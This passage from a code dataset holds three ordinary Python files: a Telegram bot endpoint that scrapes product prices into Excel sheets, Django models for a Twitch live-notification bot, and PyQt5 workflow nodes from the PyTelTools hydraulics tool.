TeleBot\nimport io\nfrom datetime import datetime\nimport openpyxl\n\nfrom database.database import DataBaseConnector\nfrom database.mydataclasses import Product\nfrom .parser import parse\nfrom .mydataclasses import \\\n ParseData, \\\n PriceLine, \\\n ErrorLine\n\nfrom .exceptions import ParseException\n\nfrom config import \\\n PRODUCTS_TABLE_NAME, \\\n PRICES_EXCEL_FILE_NAME, \\\n ERRORS_EXCEL_FILE_NAME, \\\n DATE_FORMAT_STRING\n\n\ndef get_excel(bot: TeleBot=None, message=None):\n 
connection = DataBaseConnector.get_connection()\n sql_request = (\n 'SELECT {}'.format(Product.select_values_string()) +\n 'FROM {}'.format(PRODUCTS_TABLE_NAME)\n )\n select_response = DataBaseConnector.select(\n connection=connection,\n sql_request=sql_request\n )\n\n prices_lines = []\n errors_lines = []\n\n def get_current_date():\n return datetime.today().strftime(DATE_FORMAT_STRING)\n\n if bot:\n edit_message_template = 'Прогресс: {current}\\\\' + str(len(select_response))\n text_to_send = edit_message_template.format(current=0)\n edit_message = bot.reply_to(message=message, text=text_to_send)\n\n line_counter = 0\n for line in select_response:\n product = Product.init_by_line(line)\n try:\n parse_data: ParseData = parse(product.url)\n price_line = PriceLine(\n barcode=product.barcode,\n sku=product.sku,\n competitor_name=parse_data.competitor_name,\n date=get_current_date(),\n default_price=parse_data.price_to_string(parse_data.default_price),\n promo_price=parse_data.price_to_string(parse_data.promo_price),\n url=product.url\n )\n prices_lines.append(price_line)\n except ParseException as ex:\n error_line = ErrorLine(\n barcode=product.barcode,\n sku=product.sku,\n date=get_current_date(),\n reason=ex.reason,\n url=ex.url\n )\n errors_lines.append(error_line)\n except Exception as ex:\n error_line = ErrorLine(\n barcode=product.barcode,\n sku=product.sku,\n date=get_current_date(),\n reason=str(ex),\n url=product.url\n )\n errors_lines.append(error_line)\n if bot:\n line_counter += 1\n text_to_send = edit_message_template.format(current=line_counter)\n bot.edit_message_text(\n chat_id=edit_message.chat.id,\n message_id=edit_message.message_id,\n text=text_to_send\n )\n\n prices_xlsx = openpyxl.Workbook()\n prices_sheet = prices_xlsx.active\n prices_sheet.append(PriceLine.get_excel_data_header())\n for line in prices_lines:\n prices_sheet.append(line.to_excel_line())\n\n errors_xlsx = openpyxl.Workbook()\n errors_sheet = errors_xlsx.active\n errors_sheet.append(ErrorLine.get_excel_data_header())\n for line in errors_lines:\n errors_sheet.append(line.to_excel_line())\n\n return prices_xlsx, errors_xlsx\n\n\ndef parse_endpoint_impl(bot: TeleBot, message):\n bot_message = bot.reply_to(message, 'Начало парсинга, ждите...')\n\n try:\n prices_xlsx, errors_xlsx = get_excel(bot=bot, message=bot_message)\n\n prices_xlsx_bytes_io = io.BytesIO()\n errors_xlsx_bytes_io = io.BytesIO()\n\n prices_xlsx.save(prices_xlsx_bytes_io)\n errors_xlsx.save(errors_xlsx_bytes_io)\n\n bot_message = bot.send_document(\n chat_id=message.chat.id,\n document=prices_xlsx_bytes_io.getbuffer(),\n caption='Актуальная таблица с ценами',\n visible_file_name=PRICES_EXCEL_FILE_NAME,\n reply_to_message_id=message.id\n )\n bot.send_document(\n chat_id=message.chat.id,\n document=errors_xlsx_bytes_io.getbuffer(),\n caption='Возникшие в ходе получения актуальных цен ошибки',\n visible_file_name=ERRORS_EXCEL_FILE_NAME,\n reply_to_message_id=bot_message.id\n )\n prices_xlsx.close()\n errors_xlsx.close()\n prices_xlsx_bytes_io.close()\n errors_xlsx_bytes_io.close()\n\n except Exception as ex:\n bot.reply_to(message=message, text=str(ex))\n return\n","repo_name":"yabifurkator/price-tracker-bot","sub_path":"endpoints/parse/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":4498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"9840701534","text":"import random\nimport string\nfrom django.db import models\nfrom django.contrib.contenttypes.fields import 
GenericForeignKey, GenericRelation\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.utils import timezone\nfrom cogs.utils import logify_exception_info\n\n\nclass BearerToken(models.Model):\n timestamp = models.DateTimeField(default=timezone.now, verbose_name='Timestamp')\n expired = models.BooleanField(default=False, verbose_name='Expired')\n access_token = models.CharField(max_length=255, verbose_name='Access Token')\n expires_in = models.BigIntegerField(verbose_name='Expires In (seconds)')\n refresh_token = models.CharField(max_length=255, verbose_name='Refresh Token')\n \n def __str__(self):\n return '{}'.format(self.access_token)\n \n class Meta:\n verbose_name = 'Bearer Token'\n verbose_name_plural = 'Bearer Tokens'\n ordering = ['-timestamp', 'expired']\n\n\nclass TwitchGame(models.Model):\n id = models.BigIntegerField(primary_key=True, verbose_name='Game ID')\n name = models.TextField(max_length=255, blank=True, verbose_name='Game Name', default='')\n box_art = models.URLField(blank=True, null=True, verbose_name=\"Game Box Art\")\n\n def __str__(self):\n return self.name\n \n class Meta:\n verbose_name = \"Twitch Game\"\n verbose_name_plural = \"Twitch Games\"\n\n\nclass TwitchChannel(models.Model):\n id = models.BigIntegerField(primary_key=True, verbose_name='Channel ID')\n name = models.CharField(max_length=255, verbose_name='Channel Name')\n display_name = models.CharField(max_length=255, blank=True, null=True, verbose_name='Channel Display Name')\n profile_image = models.URLField(blank=True, null=True, verbose_name=\"Profile Image URL\")\n offline_image = models.URLField(blank=True, null=True, verbose_name=\"Offline Image URL\")\n\n def __str__(self):\n if self.display_name is None or self.display_name == \"\":\n return str(self.name)\n else:\n return str(self.display_name)\n\n @property\n def url(self):\n return 'https://twitch.tv/{}'.format(self.name)\n\n class Meta:\n verbose_name = 'Twitch Channel'\n verbose_name_plural = 'Twitch Channels'\n ordering = ['name']\n\n\nclass DiscordGuild(models.Model):\n id = models.BigIntegerField(primary_key=True, verbose_name='Guild ID')\n name = models.CharField(max_length=255, verbose_name='Guild Name')\n\n def __str__(self):\n return '{}'.format(self.name)\n\n class Meta:\n verbose_name = 'Discord Guild'\n verbose_name_plural = 'Discord Guilds'\n ordering = ['name']\n\n\nclass DiscordChannel(models.Model):\n id = models.BigIntegerField(primary_key=True, verbose_name='Channel ID')\n name = models.CharField(max_length=255, verbose_name='Channel Name')\n guild = models.ForeignKey(DiscordGuild, verbose_name='Channel Guild', on_delete=models.CASCADE)\n\n def __str__(self):\n return '{}'.format(self.name)\n\n @classmethod\n def get_content_type(cls):\n return ContentType.objects.get_for_model(cls)\n\n class Meta:\n verbose_name = 'Discord Channel'\n verbose_name_plural = 'Discord Channels'\n ordering = ['guild__name', 'name']\n\n\nclass Twitter(models.Model):\n id = models.BigIntegerField(primary_key=True, verbose_name='Twitter ID')\n name = models.CharField(max_length=255, verbose_name='Username')\n\n def __str__(self):\n return '{}'.format(self.name)\n\n @classmethod\n def get_content_type(cls):\n return ContentType.objects.get_for_model(cls)\n\n class Meta:\n verbose_name = 'Twitter Account'\n verbose_name_plural = 'Twitter Accounts'\n ordering = ['name']\n\n\nclass TwitchNotification(models.Model):\n \"\"\"\n content_type = Model Type\n object_id = PK for content_type\n content_object = Reference to actual model 
with content\n\n Examples:\n - TwitchNotification.objects.create(twitch=TwitchChannel, content_object=DiscordMessage)\n - TwitchNotification.objects.create(twitch=TwitchChannel, content_object=Tweet)\n - TwitchNotification.objects.filter(twitch=TwitchChannel, content_type=ContentType.objects.get_for_model(DiscordMessage), object_id=DiscordMessage.pk)\n - TwitchNotification.objects.get(twitch=TwitchChannel, content_type=ContentType.objects.get_for_model(DiscordMessage), object_id=DiscordMessage.pk)\n\n This is meant to be used to store related information sent for\n Twitter, Discord or anything added in the future.\n\n This is where users will store what DiscordChannel or Twitter or\n anything else they want notified when they go live\n \"\"\"\n twitch = models.ForeignKey(TwitchChannel, verbose_name='Twitch Channel', on_delete=models.CASCADE)\n limit = models.Q(app_label = 'livebot')\n content_type = models.ForeignKey(ContentType, limit_choices_to=limit, on_delete=models.CASCADE)\n object_id = models.BigIntegerField()\n content_object = GenericForeignKey('content_type', 'object_id')\n message = models.CharField(max_length=255, verbose_name='Notification Message')\n delay_minutes = models.IntegerField(default=60, verbose_name='Delay Minutes')\n\n def __str__(self):\n return '{}'.format(self.twitch)\n\n def save(self, *args, **kwargs):\n # if self.message == \"\" or self.message is None:\n # if self.content_type == DiscordChannel.get_content_type():\n # self.message = \"{name} is live and is playing {game}! {url}\"\n # elif self.content_type == Twitter.get_content_type():\n # self.message = \"I'm live and playing {game}! {url}\"\n # else:\n # self.message = \"{name} is live! {url}\"\n super().save(*args, **kwargs)\n\n def get_message(self, *args, **kwargs):\n # Used to determine type of post to be made and to post about it\n message_dict = {\n 'url': self.twitch.url,\n }\n message = self.message.format(**message_dict, **kwargs)\n return message\n\n class Meta:\n verbose_name = 'Twitch Notification'\n verbose_name_plural = 'Twitch Notifications'\n\n\nclass TwitchLive(models.Model):\n twitch = models.ForeignKey(TwitchChannel, verbose_name='Twitch Channel', on_delete=models.CASCADE)\n timestamp = models.DateTimeField()\n game = models.ForeignKey(TwitchGame, verbose_name='Twitch Game', blank=True, null=True, on_delete=models.SET_NULL)\n\n def __str__(self):\n return '{}'.format(self.twitch)\n\n class Meta:\n verbose_name = 'Twitch Live'\n verbose_name_plural = 'Twitch Live Instances'\n ordering = ['-timestamp', 'twitch__name']\n\n\nclass Notification(models.Model):\n \"\"\"\n content_type = Model Type\n object_id = PK for content_type\n content_object = Reference to actual model with content\n\n Examples:\n - Notification.objects.create(live=TwitchLive, content_object=DiscordMessage)\n - Notification.objects.create(live=TwitchLive, content_object=Tweet)\n - Notification.objects.filter(live=TwitchLive, content_type=ContentType.objects.get_for_model(DiscordMessage), object_id=DiscordMessage.pk)\n - Notification.objects.get(live=TwitchLive, content_type=ContentType.objects.get_for_model(DiscordMessage), object_id=DiscordMessage.pk)\n\n This is meant to be the area to store notification results (whether success or not) when they go live\n \"\"\"\n log = models.ForeignKey('Log', verbose_name='Log Item', on_delete=models.CASCADE)\n live = models.ForeignKey(TwitchLive, verbose_name='Twitch Live', on_delete=models.CASCADE)\n limit = models.Q(app_label = 'livebot')\n content_type = 
models.ForeignKey(ContentType, limit_choices_to=limit, on_delete=models.CASCADE)\n object_id = models.BigIntegerField()\n content_object = GenericForeignKey('content_type', 'object_id')\n success = models.BooleanField(default=False, verbose_name='Success')\n\n def __str__(self):\n return '{}'.format(self.live)\n\n class Meta:\n verbose_name = 'Notification'\n verbose_name_plural = 'Notifications'\n ordering = ['-live__timestamp']\n\n\nclass Log(models.Model):\n timestamp = models.DateTimeField(default=timezone.now)\n message_token = models.CharField(blank=True, null=True, max_length=50)\n message = models.TextField(default=\"\")\n email = models.BooleanField(default=False)\n subject = models.CharField(max_length=4000, blank=True, null=True, default=None)\n body = models.CharField(max_length=4000, blank=True, null=True, default=None)\n\n def __str__(self):\n return \"[{}] - {}\".format(self.timestamp, self.message_token)\n\n def save(self, *args, **kwargs):\n self.generate_log_token(save=False)\n super().save(*args, **kwargs)\n\n @property\n def short_message(self):\n from django.template.defaultfilters import truncatechars\n return truncatechars(self.message, 100)\n\n def generate_log_token(self, save=True):\n try:\n if self.message_token is None or self.message_token == '':\n self.message_token = self.generate_token()\n if save:\n self.save()\n return True\n except Exception as e:\n print(e)\n self.__class__.objects.create(message=\"{}\\nError generating log token.\\n\\nException:\\n{}\".format(logify_exception_info(), e), message_token=\"ERROR_GENERATING_LOG_TOKEN\")\n return False\n\n def random_key(self, length=50):\n key = ''\n for i in range(length):\n key += random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits)\n return key\n\n def generate_token(self):\n token_key = random_key()\n if self.__class__.objects.filter(message_token=token_key).count() >= 1:\n token_key = self.generate_token()\n return token_key\n\n class Meta:\n verbose_name = 'Log'\n verbose_name_plural = 'Logs'\n ordering = ['-timestamp']\n\n\ndef random_key(length=50):\n key = ''\n for i in range(length):\n key += random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits)\n return key\n\nimport livebot.signals\n","repo_name":"bsquidwrd/Live-Bot","sub_path":"livebot/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"7958513914","text":"from copy import deepcopy\nimport datetime\nfrom PyQt5.QtCore import (QDir, Qt)\nfrom PyQt5.QtGui import QColor\nfrom PyQt5.QtWidgets import (QButtonGroup, QComboBox, QDialog, QFileDialog, QGroupBox,\n QHBoxLayout, QLabel, QLineEdit, QMessageBox, QPushButton, QRadioButton,\n QSpacerItem, QTableWidgetItem, QVBoxLayout, QWidget)\n\nfrom pyteltools.geom.transformation import load_transformation_map\nfrom pyteltools.gui.util import DoubleSliderBox, FrictionLawMessage, SettlingVelocityMessage, SimpleTimeDateSelection,\\\n TimeRangeSlider, VariableTable\nimport pyteltools.slf.misc as operations\nfrom pyteltools.slf.Serafin import SLF_EIT\nfrom pyteltools.slf.variables import get_available_variables, get_necessary_equations, get_US_equation, \\\n new_variables_from_US\n\nfrom .Node import Node, OneInOneOutNode, TwoInOneOutNode\n\n\nclass SelectVariablesNode(OneInOneOutNode):\n def __init__(self, index):\n super().__init__(index)\n self.category = 'Basic operations'\n self.label = 'Select\\nVariables'\n 
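# Illustrative, ORM-free sketch of the collision-checked token generation used
# by the Log model above: keep drawing random keys until one is unused. The
# plain set standing in for the database query and the helper names below are
# hypothetical; only random_key mirrors the record's own module-level helper.
import random
import string

def random_key(length: int = 50) -> str:
    alphabet = string.ascii_uppercase + string.ascii_lowercase + string.digits
    return ''.join(random.choice(alphabet) for _ in range(length))

def generate_unique_token(existing: set) -> str:
    # An iterative retry loop gives the same uniqueness guarantee as the
    # record's recursive generate_token without risking deep recursion.
    token = random_key()
    while token in existing:
        token = random_key()
    return token

taken = {random_key() for _ in range(3)}
token = generate_unique_token(taken)
print(len(token), token not in taken)  # 50 True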
self.out_port.data_type = ('slf', 'slf 3d', 'slf geom')\n self.in_port.data_type = ('slf', 'slf 3d')\n self.in_data = None\n self.data = None\n self.selected_vars = []\n self.selected_vars_names = {}\n self.new_options = tuple()\n self.friction_law = -1\n self.us_equation = None\n self.us_button = None\n self.ws_button = None\n self.first_table = None\n self.second_table = None\n\n self.YELLOW = QColor(245, 255, 207)\n self.GREEN = QColor(200, 255, 180)\n\n def get_option_panel(self):\n option_panel = QWidget()\n self.first_table = VariableTable()\n self.second_table = VariableTable()\n for var_id, (var_name, var_unit) in self.in_data.selected_vars_names.items():\n if var_id in self.selected_vars_names:\n row = self.second_table.rowCount()\n self.second_table.insertRow(row)\n id_item = QTableWidgetItem(var_id.strip())\n name_item = QTableWidgetItem(var_name.decode(SLF_EIT).strip())\n unit_item = QTableWidgetItem(var_unit.decode(SLF_EIT).strip())\n for j, item in enumerate([id_item, name_item, unit_item]):\n if not self.in_data.header.is_2d and var_id == 'Z':\n item.setFlags(Qt.NoItemFlags)\n self.second_table.setItem(row, j, item)\n else:\n row = self.first_table.rowCount()\n self.first_table.insertRow(row)\n id_item = QTableWidgetItem(var_id.strip())\n name_item = QTableWidgetItem(var_name.decode(SLF_EIT).strip())\n unit_item = QTableWidgetItem(var_unit.decode(SLF_EIT).strip())\n for j, item in enumerate([id_item, name_item, unit_item]):\n self.first_table.setItem(row, j, item)\n\n hlayout = QHBoxLayout()\n vlayout = QVBoxLayout()\n vlayout.setAlignment(Qt.AlignHCenter)\n lb = QLabel('Available variables')\n vlayout.addWidget(lb)\n vlayout.setAlignment(lb, Qt.AlignHCenter)\n vlayout.addWidget(self.first_table)\n\n computable_vars = get_available_variables(self.in_data.selected_vars, is_2d=self.in_data.header.is_2d)\n\n for var in computable_vars:\n if var.ID() not in self.selected_vars:\n row = self.first_table.rowCount()\n self.first_table.insertRow(self.first_table.rowCount())\n id_item = QTableWidgetItem(var.ID())\n name_item = QTableWidgetItem(var.name(self.in_data.language))\n unit_item = QTableWidgetItem(var.unit())\n for j, item in enumerate([id_item, name_item, unit_item]):\n self.first_table.setItem(row, j, item)\n self.first_table.item(row, j).setBackground(self.YELLOW) # set new variables colors to yellow\n else:\n row = self.second_table.rowCount()\n self.second_table.insertRow(self.second_table.rowCount())\n id_item = QTableWidgetItem(var.ID())\n name_item = QTableWidgetItem(var.name(self.in_data.language))\n unit_item = QTableWidgetItem(var.unit())\n for j, item in enumerate([id_item, name_item, unit_item]):\n self.second_table.setItem(row, j, item)\n self.second_table.item(row, j).setBackground(self.YELLOW) # set new variables colors to yellow\n\n if self.in_data.header.is_2d:\n self.us_button = QPushButton('Add US from friction law')\n self.us_button.setToolTip('Compute US based on a friction law')\n self.us_button.setEnabled(False)\n self.us_button.setFixedWidth(200)\n\n if 'US' not in self.in_data.selected_vars and 'W' in self.in_data.selected_vars and self.us_equation is None:\n available_var_IDs = list(map(lambda x: x.ID(), computable_vars))\n available_var_IDs.extend(self.in_data.selected_vars)\n if 'H' in available_var_IDs and 'M' in available_var_IDs:\n self.us_button.setEnabled(True)\n\n if 'US' not in self.in_data.selected_vars and self.us_equation is not None:\n new_vars = new_variables_from_US(self.in_data.selected_vars)\n for var in new_vars:\n if var.ID() not 
in self.selected_vars:\n row = self.first_table.rowCount()\n self.first_table.insertRow(row)\n id_item = QTableWidgetItem(var.ID().strip())\n name_item = QTableWidgetItem(var.name(self.scene().language))\n unit_item = QTableWidgetItem(var.unit())\n for j, item in enumerate([id_item, name_item, unit_item]):\n self.first_table.setItem(row, j, item)\n self.first_table.item(row, j).setBackground(self.GREEN)\n else:\n row = self.second_table.rowCount()\n self.second_table.insertRow(row)\n id_item = QTableWidgetItem(var.ID().strip())\n name_item = QTableWidgetItem(var.name(self.scene().language))\n unit_item = QTableWidgetItem(var.unit())\n for j, item in enumerate([id_item, name_item, unit_item]):\n self.second_table.setItem(row, j, item)\n self.second_table.item(row, j).setBackground(self.GREEN)\n\n self.us_button.clicked.connect(self._add_us)\n\n vlayout.addItem(QSpacerItem(1, 5))\n hlayout2 = QHBoxLayout()\n hlayout2.addItem(QSpacerItem(30, 1))\n hlayout2.addWidget(self.us_button)\n hlayout2.addItem(QSpacerItem(30, 1))\n vlayout.addLayout(hlayout2)\n vlayout.addItem(QSpacerItem(1, 5))\n\n vlayout.setAlignment(Qt.AlignLeft)\n hlayout.addLayout(vlayout)\n hlayout.addItem(QSpacerItem(15, 1))\n vlayout = QVBoxLayout()\n lb = QLabel('Output variables')\n vlayout.addWidget(lb)\n vlayout.setAlignment(lb, Qt.AlignHCenter)\n vlayout.addWidget(self.second_table)\n hlayout.addLayout(vlayout)\n option_panel.setLayout(hlayout)\n\n option_panel.destroyed.connect(self._select)\n\n return option_panel\n\n def _select(self):\n selected_vars = []\n selected_vars_names = {}\n for i in range(self.second_table.rowCount()):\n var_id, var_name, var_unit = [self.second_table.item(i, j).text() for j in range(3)]\n selected_vars.append(var_id)\n selected_vars_names[var_id] = (bytes(var_name, SLF_EIT).ljust(16),\n bytes(var_unit, SLF_EIT).ljust(16))\n self.new_options = (selected_vars, selected_vars_names)\n\n def _add_us(self):\n msg = FrictionLawMessage()\n value = msg.exec_()\n if value != QDialog.Accepted:\n return\n\n self.friction_law = msg.getChoice()\n self.us_equation = get_US_equation(self.friction_law)\n new_vars = new_variables_from_US([var for var in self.in_data.header.var_IDs\n if var in self.in_data.selected_vars])\n for var in new_vars:\n row = self.first_table.rowCount()\n self.first_table.insertRow(row)\n id_item = QTableWidgetItem(var.ID().strip())\n name_item = QTableWidgetItem(var.name(self.scene().language))\n unit_item = QTableWidgetItem(var.unit())\n for j, item in enumerate([id_item, name_item, unit_item]):\n self.first_table.setItem(row, j, item)\n self.first_table.item(row, j).setBackground(self.GREEN) # set new US color to green\n\n self.us_button.setEnabled(False)\n\n def _reset(self):\n self.in_data = self.in_port.mother.parentItem().data\n if self.selected_vars:\n known_vars = [var for var in self.in_data.header.var_IDs if var in self.in_data.selected_vars]\n new_vars = known_vars[:]\n new_vars.extend(list(map(lambda x: x.ID(), get_available_variables(new_vars,\n is_2d=self.in_data.header.is_2d))))\n if self.in_data.header.is_2d and self.us_equation is not None:\n if 'US' not in self.in_data.selected_vars and 'W' in self.in_data.selected_vars:\n us_vars = new_variables_from_US(known_vars)\n new_vars.extend([x.ID() for x in us_vars])\n intersection = [var for var in self.selected_vars if var in new_vars]\n\n if intersection:\n self.selected_vars = intersection\n self.selected_vars_names = {var_id: self.selected_vars_names[var_id]\n for var_id in intersection}\n if not 
self.in_data.header.is_2d and 'Z' not in intersection and 'Z' in self.in_data.header.var_IDs:\n self.selected_vars = ['Z'] + intersection\n self.selected_vars_names['Z'] = self.in_data.selected_vars_names['Z']\n if not self.in_data.header.is_2d:\n self.us_equation = None\n else:\n if 'US' in self.in_data.selected_vars or 'W' not in self.in_data.selected_vars:\n self.us_equation = None\n elif 'H' not in known_vars or 'M' not in known_vars:\n self.us_equation = None\n self.state = Node.READY\n self.reconfigure_downward()\n self.update()\n return\n else:\n self.selected_vars = self.in_data.selected_vars[:]\n self.selected_vars_names = deepcopy(self.in_data.selected_vars_names)\n self.us_equation = None\n else:\n self.selected_vars = self.in_data.selected_vars[:]\n self.selected_vars_names = deepcopy(self.in_data.selected_vars_names)\n self.us_equation = None\n\n def add_link(self, link):\n super().add_link(link)\n if not self.in_port.has_mother():\n return\n parent_node = self.in_port.mother.parentItem()\n if parent_node.state != Node.SUCCESS:\n if parent_node.ready_to_run():\n parent_node.run()\n if parent_node.state != Node.SUCCESS:\n return\n self._reset()\n\n def reconfigure(self):\n super().reconfigure()\n if self.selected_vars and self.in_port.has_mother():\n parent_node = self.in_port.mother.parentItem()\n if parent_node.ready_to_run():\n parent_node.run()\n if parent_node.state == Node.SUCCESS:\n self._reset()\n return\n self.in_data = None\n self.state = Node.NOT_CONFIGURED\n self.reconfigure_downward()\n self.update()\n\n def configure(self, check=None):\n if not self.in_port.has_mother():\n QMessageBox.critical(None, 'Error', 'Connect and run the input before configure this node!',\n QMessageBox.Ok)\n return\n parent_node = self.in_port.mother.parentItem()\n if parent_node.state != Node.SUCCESS:\n if parent_node.ready_to_run():\n parent_node.run()\n else:\n QMessageBox.critical(None, 'Error', 'Configure and run the input before configure this node!',\n QMessageBox.Ok)\n return\n if parent_node.state != Node.SUCCESS:\n QMessageBox.critical(None, 'Error', 'Configure and run the input before configure this node!',\n QMessageBox.Ok)\n return\n self.in_data = self.in_port.mother.parentItem().data\n if self.state != Node.SUCCESS:\n self._reset()\n\n if super().configure():\n self.selected_vars, self.selected_vars_names = self.new_options\n if not self.selected_vars:\n self.state = Node.NOT_CONFIGURED\n else:\n self.reconfigure_downward()\n self.update()\n\n def save(self):\n vars = ','.join(self.selected_vars)\n names, units = [], []\n for var in self.selected_vars:\n name, unit = self.selected_vars_names[var]\n names.append(name.decode(SLF_EIT).strip())\n units.append(unit.decode(SLF_EIT).strip())\n return '|'.join([self.category, self.name(), str(self.index()),\n str(self.pos().x()), str(self.pos().y()), str(self.friction_law),\n vars, ','.join(names), ','.join(units)])\n\n def load(self, options):\n friction_law, vars, names, units = options\n self.friction_law = int(friction_law)\n if self.friction_law > -1:\n self.us_equation = get_US_equation(self.friction_law)\n if vars:\n for var, name, unit in zip(vars.split(','), names.split(','), units.split(',')):\n self.selected_vars.append(var)\n self.selected_vars_names[var] = (bytes(name, SLF_EIT).ljust(16), bytes(unit, SLF_EIT).ljust(16))\n\n def run(self):\n success = super().run_upward()\n if not success:\n self.fail('input failed.')\n return\n input_data = self.in_port.mother.parentItem().data\n self.data = input_data.copy()\n 
self.data.us_equation = self.us_equation\n self.data.equations = get_necessary_equations(self.in_data.header.var_IDs, self.selected_vars,\n is_2d=self.data.header.is_2d, us_equation=self.us_equation)\n self.data.selected_vars = self.selected_vars\n self.data.selected_vars_names = {}\n for var_ID, (var_name, var_unit) in self.selected_vars_names.items():\n self.data.selected_vars_names[var_ID] = (var_name, var_unit)\n self.success()\n\n\nclass AddRouseNode(OneInOneOutNode):\n def __init__(self, index):\n super().__init__(index)\n self.category = 'Basic operations'\n self.label = 'Add\\nRouse\\nNumbers'\n self.out_port.data_type = ('slf out',)\n self.in_port.data_type = ('slf',)\n self.in_data = None\n self.data = None\n self.table = []\n self.settling_velocities = []\n\n def _configure(self):\n msg = SettlingVelocityMessage(self.settling_velocities, self.table)\n value = msg.exec_()\n if value != QDialog.Accepted:\n return 0\n self.table = msg.get_table()\n new_rouse = [self.table[i][0] for i in range(len(self.table))]\n new_names = [self.table[i][1] for i in range(len(self.table))]\n old_names = [self.in_data.selected_vars_names[var][0].decode(SLF_EIT).strip()\n for var in self.in_data.selected_vars]\n for rouse in new_rouse:\n if rouse in self.in_data.selected_vars:\n QMessageBox.critical(None, 'Error', 'Duplicated value found.',\n QMessageBox.Ok)\n self.table = []\n self.settling_velocities = []\n return 1\n for name in new_names:\n if name in old_names:\n QMessageBox.critical(None, 'Error', 'Duplicated name found.',\n QMessageBox.Ok)\n self.table = []\n self.settling_velocities = []\n return 1\n for i in range(len(self.table)):\n self.settling_velocities.append(float(self.table[i][0][6:]))\n return 2\n\n def _reset(self):\n self.in_data = self.in_port.mother.parentItem().data\n if not self.in_data.header.is_2d or 'US' not in self.in_data.selected_vars:\n self.state = Node.NOT_CONFIGURED\n self.in_data = None\n elif self.settling_velocities:\n old_rouse = [self.table[i][0] for i in range(len(self.table))]\n old_names = [self.table[i][1] for i in range(len(self.table))]\n new_names = [self.in_data.selected_vars_names[var][0].decode(SLF_EIT).strip()\n for var in self.in_data.selected_vars]\n for rouse in old_rouse:\n if rouse in self.in_data.selected_vars: # duplicated value\n self.state = Node.NOT_CONFIGURED\n self.settling_velocities = []\n self.table = []\n self.in_data = None\n self.reconfigure_downward()\n self.update()\n return\n for name in old_names:\n if name in new_names: # duplicated value\n self.state = Node.NOT_CONFIGURED\n self.settling_velocities = []\n self.table = []\n self.in_data = None\n self.reconfigure_downward()\n self.update()\n return\n self.state = Node.READY\n self.reconfigure_downward()\n self.update()\n\n def add_link(self, link):\n super().add_link(link)\n if not self.in_port.has_mother():\n return\n parent_node = self.in_port.mother.parentItem()\n if parent_node.state != Node.SUCCESS:\n if parent_node.ready_to_run():\n parent_node.run()\n if parent_node.state != Node.SUCCESS:\n return\n self._reset()\n\n def reconfigure(self):\n super().reconfigure()\n if self.settling_velocities and self.in_port.has_mother():\n parent_node = self.in_port.mother.parentItem()\n if parent_node.ready_to_run():\n parent_node.run()\n if parent_node.state == Node.SUCCESS:\n self._reset()\n return\n self.in_data = None\n self.state = Node.NOT_CONFIGURED\n self.reconfigure_downward()\n self.update()\n\n def configure(self, check=None):\n if not self.in_port.has_mother():\n 
QMessageBox.critical(None, 'Error', 'Connect and run the input before configure this node!',\n QMessageBox.Ok)\n return\n\n parent_node = self.in_port.mother.parentItem()\n if parent_node.state != Node.SUCCESS:\n if parent_node.ready_to_run():\n parent_node.run()\n else:\n QMessageBox.critical(None, 'Error', 'Configure and run the input before configure this node!',\n QMessageBox.Ok)\n return\n if parent_node.state == Node.SUCCESS:\n self.in_data = parent_node.data\n if not self.in_data.header.is_2d:\n QMessageBox.critical(None, 'Error', 'The input data is not 2D.', QMessageBox.Ok)\n return\n if 'US' not in self.in_data.selected_vars:\n QMessageBox.critical(None, 'Error', 'US not found.', QMessageBox.Ok)\n return\n else:\n QMessageBox.critical(None, 'Error', 'Configure and run the input before configure this node!',\n QMessageBox.Ok)\n return\n self._reset()\n else:\n self.in_data = parent_node.data\n if not self.in_data.header.is_2d:\n QMessageBox.critical(None, 'Error', 'The input data is not 2D.', QMessageBox.Ok)\n return\n if 'US' not in self.in_data.selected_vars:\n QMessageBox.critical(None, 'Error', 'US not found.', QMessageBox.Ok)\n return\n self._reset()\n\n value = self._configure()\n if value == 0:\n return\n if value == 2:\n self.state = Node.READY\n else:\n self.state = Node.NOT_CONFIGURED\n self.reconfigure_downward()\n self.update()\n\n def save(self):\n table = []\n for line in self.table:\n for j in range(3):\n table.append(line[j])\n return '|'.join([self.category, self.name(), str(self.index()),\n str(self.pos().x()), str(self.pos().y()),\n ','.join(map(str, self.settling_velocities)), ','.join(table)])\n\n def load(self, options):\n values, table = options\n table = table.split(',')\n if values:\n self.settling_velocities = list(map(float, values.split(',')))\n for i in range(0, len(table), 3):\n self.table.append([table[i], table[i+1], table[i+2]])\n\n def run(self):\n success = super().run_upward()\n if not success:\n self.fail('input failed.')\n return\n input_data = self.in_port.mother.parentItem().data\n self.data = input_data.copy()\n self.data.selected_vars.extend([self.table[i][0] for i in range(len(self.table))])\n for i in range(len(self.table)):\n self.data.selected_vars_names[self.table[i][0]] = (bytes(self.table[i][1], SLF_EIT).ljust(16),\n bytes(self.table[i][2], SLF_EIT).ljust(16))\n self.data.equations = get_necessary_equations(self.in_data.header.var_IDs, self.data.selected_vars,\n is_2d=True, us_equation=self.data.us_equation)\n self.success()\n\n\nclass SelectTimeNode(OneInOneOutNode):\n def __init__(self, index):\n super().__init__(index)\n self.category = 'Basic operations'\n self.label = 'Select\\nTime'\n self.out_port.data_type = ('slf', 'slf 3d')\n self.in_port.data_type = ('slf', 'slf 3d')\n self.in_data = None\n self.data = None\n self.selection = None\n\n self.new_options = tuple()\n self.start_index, self.end_index = -1, -1\n self.start_date, self.end_date = None, None\n self.sampling_frequency = 1\n\n def get_option_panel(self):\n slider = TimeRangeSlider()\n slider.setFixedHeight(30)\n slider.setMinimumWidth(600)\n\n self.selection = DoubleSliderBox(self)\n self.selection.startValue.setReadOnly(True)\n self.selection.endValue.setReadOnly(True)\n\n self.selection.clearText()\n slider.reinit(self.in_data.start_time, self.in_data.time_second, self.selection)\n\n if len(self.in_data.time) == 1:\n slider.setEnabled(False)\n self.selection.startIndex.setEnabled(False)\n self.selection.endIndex.setEnabled(False)\n 
